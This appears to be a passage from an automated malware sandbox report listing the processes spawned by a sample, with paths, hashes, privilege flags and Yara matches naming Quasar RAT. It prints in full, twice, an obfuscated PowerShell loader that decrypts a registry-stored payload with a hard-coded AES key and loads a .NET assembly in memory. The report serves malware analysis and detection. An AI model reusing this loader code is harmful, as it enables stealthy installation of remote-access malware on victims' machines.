[System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tSRUF);$tbgVF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uYhEUY/+HnwQeclFyB1FDUqtQym+nHVdwwfjEKKh6LU=');$tbgVF = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tbgVF, 0, $tbgVF.Length);$tbgVF = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tbgVF);$mjWsq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('v2S4NwnXvXtvXwhesSwNIQ==');$mjWsq = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mjWsq, 0, $mjWsq.Length);$mjWsq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mjWsq);$iBFKh = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RZnS/OPKxZu99whpuaUC1mhVovuCskWdCRfz1FlzhkQ9viPcHXWbSXtn8ebOdAixZCvIKg7kNsNJQfjixS10DgPnP1RgMFsS0Ufgfy1HhpeBrScxYLrFwuGlVdIKxKsNCNlET01ZQTP7t1afzsZuiFRyhdaoNNd/a48fSObOV6s0Dg4uz6IT5eoHk560k0oKDQhofXeJn4REmUW/Qa+OFgHhvk0nKSZmZIWIfiCOl824A/iJhUAIvvnXISy3KfqXbk9SxrWiI48yb3R5eHDU2SFOOdwj4/P9sUdFWqjTGEiXdZH4kVSXjz0XVe4ZYpD+he6+N8ebMZVScb8HKUN/+DzmXUfDtfwWV5MarCY6ZdmO2yJ4s2sbOzZsPvxKUwPa7yfFsYHuzQ4rPk9Yysf5MqWX04//4DGnhGl+/sl+WZ0=');$iBFKh = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iBFKh, 0, $iBFKh.Length);$iBFKh = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($iBFKh);$sRLEH = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NPfQRzZslsp7LUVLS08LhQ==');$sRLEH = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sRLEH, 0, $sRLEH.Length);$sRLEH = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($sRLEH);$sLsEZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bw6rZXASWFOFrL4CLrePaw==');$sLsEZ = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sLsEZ, 0, $sLsEZ.Length);$sLsEZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($sLsEZ);$SPFoS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QYOQkrgRiSqCZw4PoX3ndQ==');$SPFoS = 
$GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($SPFoS, 0, $SPFoS.Length);$SPFoS = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($SPFoS);$xCumf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SdFQ7WIJndJ4NA0XksAXZg==');$xCumf = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($xCumf, 0, $xCumf.Length);$xCumf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($xCumf);$WAkXF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('AR4GvTa2A8uikK6+T2nKoQ==');$WAkXF = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($WAkXF, 0, $WAkXF.Length);$WAkXF = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($WAkXF);$tSRUF0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('L3o7gT8T96iY71qHMveksg==');$tSRUF0 = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tSRUF0, 0, $tSRUF0.Length);$tSRUF0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tSRUF0);$tSRUF1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('E8Y/0E3VS02vVNfuFqTGCw==');$tSRUF1 = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tSRUF1, 0, $tSRUF1.Length);$tSRUF1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tSRUF1);$tSRUF2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3ob3sb5+Bgi0uwQxb9HNKg==');$tSRUF2 = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tSRUF2, 0, $tSRUF2.Length);$tSRUF2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tSRUF2);$tSRUF3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('E46YnTPfmALJD+Ie1fVvGQ==');$tSRUF3 = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tSRUF3, 0, $tSRUF3.Length);$tSRUF3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tSRUF3);$GhtEl.Dispose();$HJBVM1.Dispose();if (@(get-process -ea silentlycontinue $tSRUF3).count -gt 1) {exit};$BcpNi = 
[Microsoft.Win32.Registry]::$xCumf.$SPFoS($tSRUF).$sLsEZ($tbgVF);$QCqEG=[string[]]$BcpNi.Split('\');$BPwjg=MiajR(ZXowG([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QCqEG[1])));DEttm $BPwjg (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$RLOOe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QCqEG[0]);$HJBVM = New-Object System.Security.Cryptography.AesManaged;$HJBVM.Mode = [System.Security.Cryptography.CipherMode]::CBC;$HJBVM.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$HJBVM.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jR/ER/S13sxmxzdcDQ4cx+zLfjuBr/t1zOyGZlvi3Nc=');$HJBVM.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RiGEPzaIqqVKtP3vMKz42w==');$SHNYR = $HJBVM.('rotpyrceDetaerC'[-1..-15] -join '')();$RLOOe = $SHNYR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RLOOe, 0, $RLOOe.Length);$SHNYR.Dispose();$HJBVM.Dispose();$VHZiJ = New-Object System.IO.MemoryStream(, $RLOOe);$MKYCr = New-Object System.IO.MemoryStream;$pphYy = New-Object System.IO.Compression.GZipStream($VHZiJ, [IO.Compression.CompressionMode]::$tSRUF1);$pphYy.$WAkXF($MKYCr);$pphYy.Dispose();$VHZiJ.Dispose();$MKYCr.Dispose();$RLOOe = $MKYCr.ToArray();$jMAvT = $iBFKh | IEX;$mZolj = $jMAvT::$tSRUF2($RLOOe);$lOFyP = $mZolj.EntryPoint;$lOFyP.$tSRUF0($null, (, [string[]] ($mjWsq)))
                                                                                                                    Imagebase:0x7ff731020000
                                                                                                                    File size:452'608 bytes
                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000012.00000002.2928056042.0000028528D41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 00000012.00000002.3104746555.0000028539051000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                    Antivirus matches:
                                                                                                                    • Detection: 0%, ReversingLabs
                                                                                                                    • Detection: 0%, Virustotal
                                                                                                                    Has exited:false

                                                                                                                    Target ID:19
                                                                                                                    Start time:16:55:38
                                                                                                                    Start date:03/12/2023
                                                                                                                    Path:C:\Windows\System32\dllhost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\System32\dllhost.exe /Processid:{d814285b-904f-4c3a-8cab-4579f96b72d9}
                                                                                                                    Imagebase:0x7ff70f330000
                                                                                                                    File size:21'312 bytes
                                                                                                                    MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:20
                                                                                                                    Start time:16:55:38
                                                                                                                    Start date:03/12/2023
                                                                                                                    Path:C:\Windows\SysWOW64\dllhost.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\SysWOW64\dllhost.exe /Processid:{f835588e-a1ef-4d6b-bc1e-b44ddb22d787}
                                                                                                                    Imagebase:0xf80000
                                                                                                                    File size:19'256 bytes
                                                                                                                    MD5 hash:6F3C9485F8F97AC04C8E43EF4463A68C
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:21
                                                                                                                    Start time:16:55:41
                                                                                                                    Start date:03/12/2023
                                                                                                                    Path:C:\Windows\$sxr-powershell.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5088).WaitForExit();[System.Threading.Thread]::Sleep(5000); function ZXowG($YGfCS){ $HJBVM=[System.Security.Cryptography.Aes]::Create(); $HJBVM.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HJBVM.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HJBVM.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jR/ER/S13sxmxzdcDQ4cx+zLfjuBr/t1zOyGZlvi3Nc='); $HJBVM.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RiGEPzaIqqVKtP3vMKz42w=='); $SHNYR=$HJBVM.('rotpyrceDetaerC'[-1..-15] -join '')(); $ptoRz=$SHNYR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YGfCS, 0, $YGfCS.Length); $SHNYR.Dispose(); $HJBVM.Dispose(); $ptoRz;}function MiajR($YGfCS){ $VHZiJ=New-Object System.IO.MemoryStream(,$YGfCS); $MKYCr=New-Object System.IO.MemoryStream; $pphYy=New-Object System.IO.Compression.GZipStream($VHZiJ, [IO.Compression.CompressionMode]::Decompress); $pphYy.CopyTo($MKYCr); $pphYy.Dispose(); $VHZiJ.Dispose(); $MKYCr.Dispose(); $MKYCr.ToArray();}function DEttm($YGfCS,$ZtwIE){ $mZolj=[System.Reflection.Assembly]::Load([byte[]]$YGfCS); $lOFyP=$mZolj.EntryPoint; $lOFyP.Invoke($null, $ZtwIE);}$HJBVM1 = New-Object System.Security.Cryptography.AesManaged;$HJBVM1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$HJBVM1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$HJBVM1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jR/ER/S13sxmxzdcDQ4cx+zLfjuBr/t1zOyGZlvi3Nc=');$HJBVM1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RiGEPzaIqqVKtP3vMKz42w==');$GhtEl = $HJBVM1.('rotpyrceDetaerC'[-1..-15] -join '')();$tSRUF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/drqfgtKhdXyibTYP3tLyQ==');$tSRUF = 
$GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tSRUF, 0, $tSRUF.Length);$tSRUF = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tSRUF);$tbgVF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uYhEUY/+HnwQeclFyB1FDUqtQym+nHVdwwfjEKKh6LU=');$tbgVF = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tbgVF, 0, $tbgVF.Length);$tbgVF = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tbgVF);$mjWsq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('v2S4NwnXvXtvXwhesSwNIQ==');$mjWsq = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mjWsq, 0, $mjWsq.Length);$mjWsq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mjWsq);$iBFKh = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RZnS/OPKxZu99whpuaUC1mhVovuCskWdCRfz1FlzhkQ9viPcHXWbSXtn8ebOdAixZCvIKg7kNsNJQfjixS10DgPnP1RgMFsS0Ufgfy1HhpeBrScxYLrFwuGlVdIKxKsNCNlET01ZQTP7t1afzsZuiFRyhdaoNNd/a48fSObOV6s0Dg4uz6IT5eoHk560k0oKDQhofXeJn4REmUW/Qa+OFgHhvk0nKSZmZIWIfiCOl824A/iJhUAIvvnXISy3KfqXbk9SxrWiI48yb3R5eHDU2SFOOdwj4/P9sUdFWqjTGEiXdZH4kVSXjz0XVe4ZYpD+he6+N8ebMZVScb8HKUN/+DzmXUfDtfwWV5MarCY6ZdmO2yJ4s2sbOzZsPvxKUwPa7yfFsYHuzQ4rPk9Yysf5MqWX04//4DGnhGl+/sl+WZ0=');$iBFKh = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iBFKh, 0, $iBFKh.Length);$iBFKh = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($iBFKh);$sRLEH = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NPfQRzZslsp7LUVLS08LhQ==');$sRLEH = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sRLEH, 0, $sRLEH.Length);$sRLEH = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($sRLEH);$sLsEZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bw6rZXASWFOFrL4CLrePaw==');$sLsEZ = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sLsEZ, 0, $sLsEZ.Length);$sLsEZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($sLsEZ);$SPFoS = 
[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QYOQkrgRiSqCZw4PoX3ndQ==');$SPFoS = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($SPFoS, 0, $SPFoS.Length);$SPFoS = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($SPFoS);$xCumf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SdFQ7WIJndJ4NA0XksAXZg==');$xCumf = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($xCumf, 0, $xCumf.Length);$xCumf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($xCumf);$WAkXF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('AR4GvTa2A8uikK6+T2nKoQ==');$WAkXF = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($WAkXF, 0, $WAkXF.Length);$WAkXF = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($WAkXF);$tSRUF0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('L3o7gT8T96iY71qHMveksg==');$tSRUF0 = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tSRUF0, 0, $tSRUF0.Length);$tSRUF0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tSRUF0);$tSRUF1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('E8Y/0E3VS02vVNfuFqTGCw==');$tSRUF1 = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tSRUF1, 0, $tSRUF1.Length);$tSRUF1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tSRUF1);$tSRUF2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3ob3sb5+Bgi0uwQxb9HNKg==');$tSRUF2 = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tSRUF2, 0, $tSRUF2.Length);$tSRUF2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tSRUF2);$tSRUF3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('E46YnTPfmALJD+Ie1fVvGQ==');$tSRUF3 = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tSRUF3, 0, $tSRUF3.Length);$tSRUF3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tSRUF3);$GhtEl.Dispose();$HJBVM1.Dispose();if (@(get-process 
-ea silentlycontinue $tSRUF3).count -gt 1) {exit};$BcpNi = [Microsoft.Win32.Registry]::$xCumf.$SPFoS($tSRUF).$sLsEZ($tbgVF);$QCqEG=[string[]]$BcpNi.Split('\');$BPwjg=MiajR(ZXowG([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QCqEG[1])));DEttm $BPwjg (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$RLOOe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QCqEG[0]);$HJBVM = New-Object System.Security.Cryptography.AesManaged;$HJBVM.Mode = [System.Security.Cryptography.CipherMode]::CBC;$HJBVM.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$HJBVM.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jR/ER/S13sxmxzdcDQ4cx+zLfjuBr/t1zOyGZlvi3Nc=');$HJBVM.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RiGEPzaIqqVKtP3vMKz42w==');$SHNYR = $HJBVM.('rotpyrceDetaerC'[-1..-15] -join '')();$RLOOe = $SHNYR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RLOOe, 0, $RLOOe.Length);$SHNYR.Dispose();$HJBVM.Dispose();$VHZiJ = New-Object System.IO.MemoryStream(, $RLOOe);$MKYCr = New-Object System.IO.MemoryStream;$pphYy = New-Object System.IO.Compression.GZipStream($VHZiJ, [IO.Compression.CompressionMode]::$tSRUF1);$pphYy.$WAkXF($MKYCr);$pphYy.Dispose();$VHZiJ.Dispose();$MKYCr.Dispose();$RLOOe = $MKYCr.ToArray();$jMAvT = $iBFKh | IEX;$mZolj = $jMAvT::$tSRUF2($RLOOe);$lOFyP = $mZolj.EntryPoint;$lOFyP.$tSRUF0($null, (, [string[]] ($mjWsq)))
                                                                                                                    Imagebase:0x7ff731020000
                                                                                                                    File size:452'608 bytes
                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                    Has exited:false

                                                                                                                    Target ID:22
                                                                                                                    Start time:16:55:42
                                                                                                                    Start date:03/12/2023
                                                                                                                    Path:C:\Windows\System32\dllhost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\System32\dllhost.exe /Processid:{ee0091e4-9e0c-4ff3-b26f-57d4a238bd7c}
                                                                                                                    Imagebase:0x7ff70f330000
                                                                                                                    File size:21'312 bytes
                                                                                                                    MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:23
                                                                                                                    Start time:16:55:42
                                                                                                                    Start date:03/12/2023
                                                                                                                    Path:C:\Windows\SysWOW64\dllhost.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\SysWOW64\dllhost.exe /Processid:{f5381469-1700-4694-82dd-1722ad94b3e0}
                                                                                                                    Imagebase:0x7ff6eef20000
                                                                                                                    File size:19'256 bytes
                                                                                                                    MD5 hash:6F3C9485F8F97AC04C8E43EF4463A68C
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:24
                                                                                                                    Start time:16:55:42
                                                                                                                    Start date:03/12/2023
                                                                                                                    Path:C:\Windows\System32\winlogon.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:winlogon.exe
                                                                                                                    Imagebase:0x7ff7cd660000
                                                                                                                    File size:906'240 bytes
                                                                                                                    MD5 hash:F8B41A1B3E569E7E6F990567F21DCE97
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:false

                                                                                                                    Target ID:25
                                                                                                                    Start time:16:55:42
                                                                                                                    Start date:03/12/2023
                                                                                                                    Path:C:\Windows\System32\lsass.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\lsass.exe
                                                                                                                    Imagebase:0x7ff7a2ae0000
                                                                                                                    File size:59'456 bytes
                                                                                                                    MD5 hash:A1CC00332BBF370654EE3DC8CDC8C95A
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:false

                                                                                                                    Target ID:26
                                                                                                                    Start time:16:55:43
                                                                                                                    Start date:03/12/2023
                                                                                                                    Path:C:\Windows\SysWOW64\wbem\WmiPrvSE.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                    Imagebase:0xdd0000
                                                                                                                    File size:418'304 bytes
                                                                                                                    MD5 hash:64ACA4F48771A5BA50CD50F2410632AD
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:27
                                                                                                                    Start time:16:55:43
                                                                                                                    Start date:03/12/2023
                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                                                                                                                    Imagebase:0x7ff6eef20000
                                                                                                                    File size:55'320 bytes
                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:false

                                                                                                                    Target ID:28
                                                                                                                    Start time:16:55:43
                                                                                                                    Start date:03/12/2023
                                                                                                                    Path:C:\Windows\System32\dllhost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\System32\dllhost.exe /Processid:{f78b27af-93da-4459-95e7-4c5d26a44dc8}
                                                                                                                    Imagebase:0x7ff70f330000
                                                                                                                    File size:21'312 bytes
                                                                                                                    MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:29
                                                                                                                    Start time:16:55:43
                                                                                                                    Start date:03/12/2023
                                                                                                                    Path:C:\Windows\System32\dllhost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\System32\dllhost.exe /Processid:{85d85a52-fed6-47b1-b615-c3a69ff1ad14}
                                                                                                                    Imagebase:0x7ff70f330000
                                                                                                                    File size:21'312 bytes
                                                                                                                    MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:30
                                                                                                                    Start time:16:55:43
                                                                                                                    Start date:03/12/2023
                                                                                                                    Path:C:\Windows\System32\dwm.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:dwm.exe
                                                                                                                    Imagebase:0x7ff74e710000
                                                                                                                    File size:94'720 bytes
                                                                                                                    MD5 hash:5C27608411832C5B39BA04E33D53536C
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:false

                                                                                                                    Target ID:31
                                                                                                                    Start time:16:55:44
                                                                                                                    Start date:03/12/2023
                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                                                                                                                    Imagebase:0x7ff6eef20000
                                                                                                                    File size:55'320 bytes
                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:false

                                                                                                                    Target ID:32
                                                                                                                    Start time:16:55:45
                                                                                                                    Start date:03/12/2023
                                                                                                                    Path:C:\Windows\SysWOW64\dllhost.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\SysWOW64\dllhost.exe /Processid:{8c0bd129-911b-4af2-a0bc-93995d45cd5f}
                                                                                                                    Imagebase:0xf80000
                                                                                                                    File size:19'256 bytes
                                                                                                                    MD5 hash:6F3C9485F8F97AC04C8E43EF4463A68C
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:33
                                                                                                                    Start time:16:55:45
                                                                                                                    Start date:03/12/2023
                                                                                                                    Path:C:\Windows\SysWOW64\dllhost.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\SysWOW64\dllhost.exe /Processid:{0979c3ff-3e63-4ea9-9d2b-0e24c33cbca9}
                                                                                                                    Imagebase:0xf80000
                                                                                                                    File size:19'256 bytes
                                                                                                                    MD5 hash:6F3C9485F8F97AC04C8E43EF4463A68C
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:34
                                                                                                                    Start time:16:55:45
                                                                                                                    Start date:03/12/2023
                                                                                                                    Path:C:\Windows\System32\dllhost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\System32\dllhost.exe /Processid:{59453cd9-80c7-4c7f-84ca-38ec20f032b9}
                                                                                                                    Imagebase:0x7ff70f330000
                                                                                                                    File size:21'312 bytes
                                                                                                                    MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:35
                                                                                                                    Start time:16:55:45
                                                                                                                    Start date:03/12/2023
                                                                                                                    Path:C:\Windows\System32\dllhost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\System32\dllhost.exe /Processid:{8b9e4941-156b-4561-b75c-88dc752d3d8b}
                                                                                                                    Imagebase:0x7ff70f330000
                                                                                                                    File size:21'312 bytes
                                                                                                                    MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:36
                                                                                                                    Start time:16:55:45
                                                                                                                    Start date:03/12/2023
                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                                                                                                                    Imagebase:0x7ff6eef20000
                                                                                                                    File size:55'320 bytes
                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
